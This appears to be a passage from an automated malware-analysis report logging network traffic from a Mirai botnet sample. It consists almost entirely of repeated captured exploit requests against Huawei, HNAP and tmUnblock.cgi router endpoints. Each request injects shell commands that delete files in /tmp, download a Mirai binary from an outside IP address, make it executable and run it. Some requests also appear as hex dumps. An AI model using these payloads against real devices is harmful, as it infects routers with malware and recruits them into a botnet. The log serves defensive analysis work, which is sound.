HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 